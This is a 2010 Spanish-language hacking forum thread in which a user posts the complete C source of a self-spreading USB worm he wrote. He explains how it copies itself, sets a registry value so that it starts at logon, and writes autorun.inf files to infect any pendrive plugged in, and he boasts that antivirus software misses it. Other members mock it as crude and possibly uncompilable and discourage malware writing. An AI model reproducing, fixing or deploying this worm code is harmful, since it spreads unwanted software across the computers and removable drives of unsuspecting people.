Virus sys32.exe

Iniciado por Garfield07, 11 Junio 2010, 20:54 PM

0 Miembros y 1 Visitante están viendo este tema.

Garfield07

Buenas, despues de muxas preguntas aqui, me desconecte de internet, e intente acer algo facilito. Cree el virusaco "boot.exe", que es taan efectivo k consume todos los recursos del PC, y eso k era un simple gusano...
luego me encerre a jugar al Counter un tiempo... un dia le eche un vistazo al escritorio y vi a mi bonito Dev-Cpp sucio y desgastado... empeze a programar!!!

despues de 2 bonitas horas de prácticas, nacio SYS32.exe!!!!


os pongo el codigo para k le echeis un vistazo. es muy sencillo, no se como no lo hice antes....
#include <windows.h>
#include <stdio.h>

int a;
FILE *fp;
char nowdir [50];
char usb [12][5]={"D:\\", "E:\\", "F:\\", "G:\\", "H:\\"};
char usb2 [12][5]={"D:\\", "E:\\", "F:\\", "G:\\", "H:\\"};

int main ()
{
    GetModuleFileName (NULL, nowdir, 256);
    CopyFile (nowdir, "C:\\Temp\\sys32.exe", 0);
    registro ();
    while (1)
    {
          pendrive ();
  sleep (5);
    }
}

int registro ()
{
    HKEY hkey;
    RegOpenKeyEx (HKEY_CURRENT_USER,"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0, KEY_SET_VALUE, &hkey);
    RegSetValueEx(hkey,"run",0,REG_SZ,"C:\\Temp\\sys32.exe",50);
    RegCloseKey(hkey);
}

int pendrive ()
{
    for (a=0; a<=5; a++)
    {
        if (GetDriveType (usb [a])==2)
        {
             strcat (usb [a], "\\sys32.exe");
             CopyFile (nowdir, usb [a], 0);
             
             strcat (usb2 [a], "\\autorun.inf");
             fp=fopen (usb2 [a], "wb+");
             fprintf (fp, "[autorun]\nopen=sys32.exe");
             fclose (fp);
             fp=fopen (usb2 [a], "rb+");
        }
    }
}


funciona asi:
1. Se copia a "C:\Temp".
2. Se añade al registro, en una llave en la que todos tienen permisos, pero en la que puedes hacer que se abra al inicio de sesión. La única pega es que solo se abre en la sesion en la que se abre.
3. Hace un bucle infinito comprobando si se enchufan pendrives. Si se enchufan, se copia a este sitio, y crea un autorun. Lo cierra para guardar cambios y lo abre para k no lo borres.

Lo mejor es que no lo detecta ningun antivirus (por ahora, pork sin querer lo mande a analizar a ESET. a ver cuanto dura).+


Importante: El code es mio, y sus ideas, pero he de recordar que "http://usuarios.multimania.es/inyx/Gusano%20basico.pdf" me enseño a copiarme al registro. Como veis, es completamente diferente.


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo

leogtz

"Completamente diferente", ¿diferente en qué?

Es exactamente igual a todos los "gusanos" que hay.

-¿Qué tal si no tengo una unidad C:?"
-¿Y si no tienes permisos para editar el registro?
-¿Y si tengo más unidades USB de las que pones en el vector de cadenas?
Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com

Garfield07

diferente al de la pagina.

no quiero añadirle mas unidades xk solo es una prueba k se me ocurrio hacer un dia.
se que lo haceis mejor, pero solo lo pongo para k lo veais.
la mayoria de los ordenadores tienen C:, y si no, pues no se copia...
la mayoria tiene tambien permisos en el registro, sobre todo en tu propia cuenta, pues es CURRENT_USER!


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo

[L]ord [R]NA

Cita de: ZarKerveros en 11 Junio 2010, 21:13 PM
diferente al de la pagina.

no quiero añadirle mas unidades xk solo es una prueba k se me ocurrio hacer un dia.
se que lo haceis mejor, pero solo lo pongo para k lo veais.
la mayoria de los ordenadores tienen C:, y si no, pues no se copia...
la mayoria tiene tambien permisos en el registro, sobre todo en tu propia cuenta, pues es CURRENT_USER!

Disculpa, pero es la forma mas absurda que he visto para infectar pendrives, una forma patetica de buscar unidades... solo te doy un consejo, las APIs de Windows estan ahi por algo y no veo nada de original en esto... lo unico que veo es que debe de ser mas detectado que el Happy99.

Te recomiendo que te eduques bien sobre el tema antes de ponerte a programar malware.

Eternal Idol

#4
ZarKerveros: yo te recomiendo que te pongas a aprender y practicar cosas utiles y constructivas.
La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste.
Juan Domingo Perón

-Ramc-

Lo diferente es que este no le va a compilar, el main no va a encontrar las funciones.

Shhh... be vewy, vewy, quiet!  I'm hunting wabbits...
LA PANDILLA MAS GRANDE DE MI CIUDAD, SE LLAMA POLICIA NACIONAL.

leogtz

Cita de: -Ramc- en 11 Junio 2010, 22:24 PM
Lo diferente es que este no le va a compilar, el main no va a encontrar las funciones.

Jaja, +1, pero recuerda que usa su "bonito Dev-c++", con el todo se puede.  :xD
Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com

Eternal Idol

En C compilaria me parece.
La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste.
Juan Domingo Perón

-Ramc-

Cita de: Eternal Idol en 11 Junio 2010, 22:28 PM
En C compilaria me parece.
Ya te me tiraste el chiste. jeje

En C++ no compila y en C lanza warnings, pero, compila.

Aunque yo odio ver que el compilador me lanze un warning así sea por el salto de línea al final del archivo. jajaja

Shhh... be vewy, vewy, quiet!  I'm hunting wabbits...
LA PANDILLA MAS GRANDE DE MI CIUDAD, SE LLAMA POLICIA NACIONAL.

Littlehorse

Si, igualmente es ideal usar prototipos porque en ciertos casos si serán necesarios. Ademas ayudan a la lectura del código.

Tienes que mejorar varias cosas en ese código, pero estoy de acuerdo con Eternal Idol; hay muchas cosas para hacer que te van a aportar mucho mas que programar malware. Basta con usar un poco el buscador.

Saludos
An expert is a man who has made all the mistakes which can be made, in a very narrow field.